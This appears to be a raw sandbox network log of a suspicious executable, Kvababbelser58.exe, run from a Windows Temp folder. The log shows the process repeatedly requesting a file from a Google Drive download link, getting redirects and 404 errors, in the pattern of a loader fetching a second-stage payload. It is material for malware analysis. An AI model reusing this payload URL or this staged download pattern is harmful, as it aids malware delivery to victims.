                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:02 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-IJZWlmDdYewOtGxtT8-ckg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      3 | 192.168.2.7 | 49972 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:03 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:04 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgR3OmXTgs2fyZL9Lrw4lucHPc-7cCcpEJ9vaLjGWbn_LikgV1KaM0y3MIMG224fWC_5
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:04 GMT
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-Sl9nh-YO6cDK7CcQgST5tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:04 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vj_ywR0heGaXZtO1atFNGg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      4 | 192.168.2.7 | 49973 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:04 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:05 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:05 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-fKgR-trA6eMm8tQ15FyMpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      5 | 192.168.2.7 | 49974 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:06 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:06 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgQJmEdCyP-Hmuwz9hJ9gDloHXupxA_CDRV6E_koZTRez1bxH5ANe-61AXhf0JTtbxD-
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:06 GMT
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-gKiuzzxo1j_3g4MQHGKj_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:06 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Sjs_dnyj8fCmfBQ_mHGAJw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      6 | 192.168.2.7 | 49975 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:07 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:07 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:07 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-vNbrRvXpJkB8p387xgqR_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      7 | 192.168.2.7 | 49976 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:08 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:08 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgQY1gtx9tUvyQr-YalIe5dy154ewzwGJRyLWpNNpak5OgELrjLos4bD0-xxBxFHbGyTrFflm4w
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:08 GMT
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-yYX3teXftvJUH-6jD18A1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:08 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jKKzBtKJSpFatT-Ji00-tw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      8 | 192.168.2.7 | 49977 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:09 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:09 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:09 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: script-src 'nonce-STZiRxt5WP49yncyFrJZRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      9 | 192.168.2.7 | 49978 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:10 UTC | 468 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:10 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgTBdrd6V48dOp4BS-iqdzaYtjYBLAIc5PwImhk5xogB7XM9Gc_n8nk-JUazgEx4x2ZF
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:10 GMT
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-lTC9gWrixil5kxVqTBJDWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
                                                                                                      2025-01-10 23:50:10 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tkkmMSGHsksSxSRa8jGsIQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      10 | 192.168.2.7 | 49979 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      2025-01-10 23:50:11 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
                                                                                                      2025-01-10 23:50:12 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:12 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
